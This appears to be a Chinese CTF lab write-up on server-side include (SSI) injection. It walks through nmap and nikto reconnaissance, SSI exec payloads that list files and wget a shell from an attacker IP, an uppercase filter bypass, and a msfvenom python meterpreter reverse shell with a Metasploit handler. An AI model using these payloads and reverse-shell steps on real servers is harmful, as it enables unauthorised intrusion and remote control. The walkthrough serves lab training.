CTF实验:SSI注入

SSI注入攻击介绍

SSI(server side inject)的出现是为了赋予html静态页面动态的效果,通过SSI来执行系统命令,并返回对应的结果。  
  如果在网站目录中发现了 .stm, .shtm .shtml,并且网站对于SSL的输入没有做到严格过滤,很有可能被SSI注入攻击。

信息探测

扫描主机服务信息以及服务版本
– nmap -sV 靶场IP地址
快速扫描主机全部信息
– nmap -T4 –A -v 靶场IP地址
探测敏感信息
– nikto -host http://靶场IP地址:端口
dirb HTTP://IP:端口
只开了http服务
CTF实验:SSI注入
CTF实验:SSI注入
CTF实验:SSI注入
找到敏感页面,打开
将文件下载下来
CTF实验:SSI注入
可以查看文件的内容

CTF实验:SSI注入

CTF实验:SSI注入
可能是提示记下来
CTF实验:SSI注入

漏洞利用

根据提示来利用对应SSL注入漏洞
列举当前目录中的文件和目录
《!–#exec cmd=“ls” -->
切换到指定目录
《!–#exec cmd=“cd /root/dir/”>
下载shell脚本 并重命名为shell.php
《!–#exec cmd=“wget http://ip/shell.txt | rename shell.txt shell.php” -->

尝试输入一些命令
CTF实验:SSI注入
返回结果
可以看到Target里<被注释了,Feedback里exec被注释了,将其改为大写再试试,成功了CTF实验:SSI注入

制作webshell

msfvenom -p python/meterpreter/reverse_tcp lhoost=ip lport=4444 -f raw > shell.py

启动msfconsoleCTF实验:SSI注入
设置参数
msf > use exploit/multi/handler
msf exploit(handler) > set payload python/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
CTF实验:SSI注入

上传shell反弹shell

要shell.py 放在var/www/html 里 并开启apache2服务
CTF实验:SSI注入
准被上传
CTF实验:SSI注入
CTF实验:SSI注入
CTF实验:SSI注入
成功进入
sysinfo 查看系统信息
shell 进入系统shell
优化终端 python –c ‘import pty;pty.spawn(“/bin/bash”)’
CTF实验:SSI注入
CTF实验:SSI注入

总结

在CTF比赛中,对于SSI漏洞服务器具有很多过滤机制,我们需要对其进行绕过,比如大小写;